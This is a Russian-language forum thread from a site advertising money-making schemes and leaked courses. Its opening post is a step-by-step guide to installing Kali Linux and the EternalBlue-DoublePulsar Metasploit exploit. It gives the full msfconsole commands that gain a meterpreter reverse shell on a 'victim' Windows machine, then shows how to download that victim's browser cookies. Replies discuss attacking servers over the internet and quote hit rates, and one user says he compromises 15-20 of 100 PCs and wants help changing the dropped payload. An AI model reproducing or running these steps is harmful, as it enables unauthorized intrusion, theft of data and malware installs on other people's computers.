• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Eternalblue-Doublepulsar Или взлом компьютера на растоянии

Gooseman

Участник
Сообщения
75
Реакции
31
0 руб.
Telegram
Сегодня я постараюсь вам доступным языком обьяснить и пошагово дать инструкцию, как всё же использовать данный эксплоит в своих целях.
upd: Я никого не побуждаю к действиям. Всё это противозоконно, если вы делайте это в своих корыстных целях
На сегодняшний день я не очень то и много нашёл информации по поводу подробной установки Kali linux на ваше устройтво и установку Eternalblue-Doublepulsar(у меня флешка, если вы ставите её на основной жёсткий диск, то ёбли с флешкой вы сможете избежать) Этот способ не 100%-ый т.к. работает на уязвимости порта 445. Я уже писал статью, но сейчас будет подробная пошагавая инструкция исходя из моих опытов. Если у вас вылезла ошибка, я постараюсь ответить и помочь вам.
Итак приступим.​
Нам потребуется: Прямые руки + Интернет (желательно быстрый)
С самого начала скачиваем iso файл Kali linux с офф. сайта
https://www.kali.org/downloads/

Скачиваем Kali linux 64/32 bit (Без разницы) и скачиваем программу Rufus
После мы открываем Rufus и выбираем устройство, после во второй строке выбираем "MBR для компьютеров с UEFI" - Ставим мы его потому что некоторые версии BIOS не видят флешки с "MBR для компьютеров с BIOS или UEFI". Сам сталкивался с такой проблемой.
Потом жмём на дисковод рядом с строкой "FreeDOS" и выбираем путь до нашего Kali Linux.iso
Соглашаемся с тем, что мы потеряем все данные на флешке и начнётся установка.
После у нас есть уже сам Kali linux на флешке! Но! Что бы сохранять файлы на нём нужно сделать ещё один раздел под названием persistence и с файловой системой Ext4. Можно сделать это как и в линуксе, так и с виндой. Мой выбор пал на программу MiniTool Partition Wizard
Скачиваем бесплатную версию и в меню выбираем MiniTool Partition Wizard Free
После разделяем флешку на 2 части, на одной у нас будет система, на другой будут храниться файлы, которые были скачаны на Kali linux'е.
Создаём раздел persistence с файловой системой Ext4 и ждём.
И так. Загружаемся с биоса и выбираем флешку. И в загрузочном меню сначала выбирайте версию Live.
После загрузки вас поприветствует приятный интерфейс Kali linux. Но, нам нужно прописать пару команд, без которых у нас ничего сохраняться не будет.
Код:
fdisk -l
Мы смотрим под каким названием у нас находится раздел persistence
После как мы найдём его пишем следующее... (У меня лично пишет /dev/sdb2, у вас скорее всего будет по другому)
Код:
mkdir -p /mnt/sdb2
mount /dev/sdb2 /mnt/sdb2
echo "/ union" > /mnt/sdb2/persistence.conf
umount /dev/sdb2
reboot
И после перезагрузки мы выбираем тертью строку с persistence.
Хорошо, теперь у нас есть флешка с Kali linux, которая сохраняет все файлы. Далее нам нужно установить wine для работы с EternalBlue-Doublepulsar.
Пишем в консоли
Код:
wine
И он нам пишет
Код:
it looks like multiarch needs to be enabled. as root, please execute "dpkg --add-architecture i386 && apt-get update && apt-get install wine32"
 Usage: wine PROGRAM.... и т.д.
Из вышесказанного сообщения нам нужно прописать в консоль
Код:
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
Лично у меня 16гб флешка и с 4мб/сек устанавливалось всё это добро около 2-х или трёх часов. Но того стоило (флешка старая, у вас должно быть быстрее)
После установки компонентов пишем снова в консоль
Код:
wine
После он не должен писать насчёт установки wine32.
Хорошо, дальше нам нужно установить сам EternalBlue-DoublePulsar
Пишем
Код:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
и ждём установки файлов.
Далее нам нужно закинуть это в путь /root/.msf4/modules/exploits/windows/smb/ Для открытия скрытых файлов в Linux просто нажмите комбинацию клавиш ctrl + h. Если у вас нету папки .msf4 то пропишите в консоль
Код:
msfconsole
И если у вас нет данных папок /exploits/windows/smb/, то создайте их вручную и СКОПИРУЙТЕ! туда следующие файлы (eternalblue_doublepulsar.rb, deps)
После открываем снова
Код:
msfconsole
и ждём загрузки.
После выполняем ряд следующих комманд, и да, нам нужно узнать ip адресс жертвы, я лично использовал на Linux ifconfig, а для жертвы на телефоне прилождение Fing.
Для примера возьмём наш ip => 192.168.0.3
А для жертвы придумаем => 192.168.0.8
Поехали
Код:
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.0.108
run
(Тут он пишет, что всё ок)
use exploit/windows/smb/eternalblue-doublepulsar
set rhost 192.168.0.108
set lhost 192.168.0.103
set targetarchitecture x64(x86)
set windows/x64/meterpreter/reverse_tcp
set processinject lsass.exe
run
Ах да, чуть не забыл, у вас изначально не будет директории
Код:
mkdir -p /root/.wine/drive_c
- вы должны создать её самостоятельно написав следующее
Всё! У вас появится доступ к чужому компьютеру (Тестировалось на операционной системе Windows 7 x64 ultimate)
Вот некоторые команды meterpreter для использования:
Download - загружает с удалённого компьютера на ваш файлы, например вам нужно скачать куки браузера, что бы потом уже использовать их, тогд вы пишете
Код:
downlaod c:/users/...... (место хранения куки и сам файл куки или папку, где есть этот файл)
Команда "help", как и может ожидаться, отображает меню помощи "Meterpreter".
Команда ‘background‘ переводит текущую сессию Meterpreter в фоновый режим, и мы возвращаемся в командную строку "msf". Для того чтобы вернуться в сессии Meterpreter, просто необходимо обратится к ней снова.
Команда "edit" открывает файл, расположенный на целевом хосте. Он использует "vim" и все доступные команды данного редактора.
Команда "execute" запускает команду на целевом компьютере.
Остальной список базовых команд вы сможете найти на сайте http://www.stanovlenie.org.ua/meterpreter-basic-commands/
 
Последнее редактирование:

Delim

*
*
Сообщения
66
Реакции
72
4000 руб.
Работает только на старых не обновленных Семерках винды, майкрософт обнову выпустили и закрыли дырку эту )
 

Gooseman

Участник
Сообщения
75
Реакции
31
0 руб.
Telegram
Работает только на старых не обновленных Семерках винды, майкрософт обнову выпустили и закрыли дырку эту )
Да, я писал об этом в предыдущей теме на счёт этой уязвимости, но бОльшинство предпочитает семёрку без обновлений, т.к. она нагружает систему.
 

/.e7z

Резидент
Сообщения
179
Реакции
335
0 руб.
Jabber
Работает только на старых не обновленных Семерках винды, майкрософт обнову выпустили и закрыли дырку эту )

Информация в корне не верная. Как было обновление ОС, так было обновление Eternalblue.
Github в частности в себе содержит обновление Worawit:
Kоторый подготовил публичное обновление до версии 8.1 и приватное обновление до версии 10.0.
 

/.e7z

Резидент
Сообщения
179
Реакции
335
0 руб.
Jabber
1. Знаком с данной темой и хочу поправить, нужно покупать VDS и на него уже всё устанавливать или покупать у своего провайдера белый IP, но это "глупо"
2. Kali ставить вовсе не обязательно, достаточно поставить Ubuntu или Debian и накатить туда необходимые программы
3. Уже давно есть переписанный сполит под Ruby, который эксплуатирует уязвимость от WinServer 2003, до WinServer 2016
4. Хоть эта уязвимость в паблике уже около года, но уязвимость имеют примерно 20% серверов, из которых процентов 20 успешно пробивается, т.е. из 1000 дедиков примерно к 40 можно получить доступ

  • VDS и "Белый IP" не нужны, это не сервер для вебсайта.
  • Цифра 20% - взята откуда? Можно пруф?
  • Атаки на smb от wannacry, petya и его аналогов, а так-же наличие эксплойта в публичных репозитория искоренили необновленные системы доступные из "интернет".
 

Gooseman

Участник
Сообщения
75
Реакции
31
0 руб.
Telegram
1. Знаком с данной темой и хочу поправить, нужно покупать VDS и на него уже всё устанавливать или покупать у своего провайдера белый IP, но это "глупо"
2. Kali ставить вовсе не обязательно, достаточно поставить Ubuntu или Debian и накатить туда необходимые программы
3. Уже давно есть переписанный сполит под Ruby, который эксплуатирует уязвимость от WinServer 2003, до WinServer 2016
4. Хоть эта уязвимость в паблике уже около года, но уязвимость имеют примерно 20% серверов, из которых процентов 20 успешно пробивается, т.е. из 1000 дедиков примерно к 40 можно получить доступ
Да, это информация и в правду находится в паблике уже больше года, но я не видел ни одной статьи, которая описывает полную установку с нуля. Приходилось собирать информацию из разных источников и сделать что-то типо своего.
 

/.e7z

Резидент
Сообщения
179
Реакции
335
0 руб.
Jabber
Да, это информация и в правду находится в паблике уже больше года, но я не видел ни одной статьи, которая описывает полную установку с нуля. Приходилось собирать информацию из разных источников и сделать что-то типо своего.

Google: "Eternalblue install" - Результатов: примерно 115 000 (0,38 сек.)
Youtube: Результатов: примерно 4 170
 

Gooseman

Участник
Сообщения
75
Реакции
31
0 руб.
Telegram
Google: "Eternalblue install" - Результатов: примерно 115 000 (0,38 сек.)
Youtube: Результатов: примерно 4 170
Отдельно был поиск начат с установкой Kali linux на флешку + установка Eternalblue Doublepulsar на Kali linux. Всё. Если ты мне найдёшь видео/статью/или подобное, где описывают подробную установку дистрибутива kali и установку туда eternalblue doublepulsar, то я удалю свою статью.
P.S. (Всё должно быть в одной статье)
 

/.e7z

Резидент
Сообщения
179
Реакции
335
0 руб.
Jabber
Отдельно был поиск начат с установкой Kali linux на флешку + установка Eternalblue Doublepulsar на Kali linux. Всё. Если ты мне найдёшь видео/статью/или подобное, где описывают подробную установку дистрибутива kali и установку туда eternalblue doublepulsar, то я удалю свою статью.
P.S. (Всё должно быть в одной статье)


Даже искать не стану, вся концепция статьи: Как установить виндовс, что бы установить брузер опера на нее.
 

Gooseman

Участник
Сообщения
75
Реакции
31
0 руб.
Telegram
Окей, я напишу ещё раз. Я совместил несколько статей, что бы было легче новым пользователям установить eternalblue doublepulsar. Если подобные темы, как установка линукса и установка данного эксплоита на линукс была описана в ОДНОЙ статье, то я удалю статью.
 

ГдеМойГусь

Новичок
Сообщения
3
Реакции
0
0 руб.
Дарова хакеры. Мне вот очень интересно - можно ли провернуть тоже самое, только не в локалке. Я лично пытался с другой сети на тот же ПК (порт 445 открыл, винда 7 х64 ). Но он не отмечал его как возможную жертву. Обладает ли кто информацией по настройке сплоита под работу с удаленными ПК?
 

/.e7z

Резидент
Сообщения
179
Реакции
335
0 руб.
Jabber
Общаюсь с человеком, который полностью автоматизировал весь процесс, от скана IP, до залития своего файла, от него как-раз такие слова и были



Без VDS будешь только в локалке ловить, как у человека выше постом

Хм, дай посчитаю: Локальная сеть и весь интернет + сети с прямым NATом на белом IP.
Выходит как-то больше список. Что тебе даст запуск Eternal на белом IP - ума не приложу. Видимая часть сети будет той-же самое, что и с домашнего пк, что с VDS(В частности, сеть VDS - сугубо виртуальная и бить Eternal в его локаль - тоже не резон)

Относительно 1/5 или 20% - сервера пробили WannaCry, после них Петя, после них прошлись сканнером после слива Eternal, а после них касперский прогоняет сеть ежедневно.
Пусть твой друг меньше треплет языком.
 

/.e7z

Резидент
Сообщения
179
Реакции
335
0 руб.
Jabber
Дарова хакеры. Мне вот очень интересно - можно ли провернуть тоже самое, только не в локалке. Я лично пытался с другой сети на тот же ПК (порт 445 открыл, винда 7 х64 ). Но он не отмечал его как возможную жертву. Обладает ли кто информацией по настройке сплоита под работу с удаленными ПК?

Не имеют никакой разницы количество прыжков для пакетов от тебя до цели. Если полный маршрут использует непосредственно SMB протокол и возвращает его обратно без какой-либо инкапсуляции - что P2P метровым кабелем, что через трансатлантическую магистраль - не важно.
 

ГдеМойГусь

Новичок
Сообщения
3
Реакции
0
0 руб.
Не имеют никакой разницы количество прыжков для пакетов от тебя до цели. Если полный маршрут использует непосредственно SMB протокол и возвращает его обратно без какой-либо инкапсуляции - что P2P метровым кабелем, что через трансатлантическую магистраль - не важно.
Стоит ли вообще углубляться в данную тему или это уже баян?
 

ГдеМойГусь

Новичок
Сообщения
3
Реакции
0
0 руб.
Это знания, стоит ознакомиться и решить, углубляться или нет )
тема действительно интересная, но я не могу найти достаточно развернутого источника по данному эксплоиту. Не подскажешь где ты читал или где можно почитать?
 

klarkxxx

Новичок
Сообщения
1
Реакции
0
0 руб.
Telegram
ребятки нужен шарящий человек по данному эксплоиту, есть рабочая сборка, нужно разобраться как менять проливаемый файл в ней.
Стукните сюда или в телегу @klarkxxx
 

klarkxxx

Новичок
Сообщения
1
Реакции
0
0 руб.
Telegram
Этот эксплоит стар как мир,уже прикрыли давно
ну как его прикрыли если я его и щас юзаю? со 100 пк 15-20 успешно пробивает, ломай дедики да юзай чем не инсталлы?
просто у меня не мой файл выкачивает жертвам
 

Morfi6

Новичок
Сообщения
1
Реакции
0
0 руб.
cp: не удалось выполнить stat для '/root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.Skeleton.xml': Нет такого файла или каталога
sed: невозможно прочитать /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: Нет такого файла или каталога
 
Сверху Снизу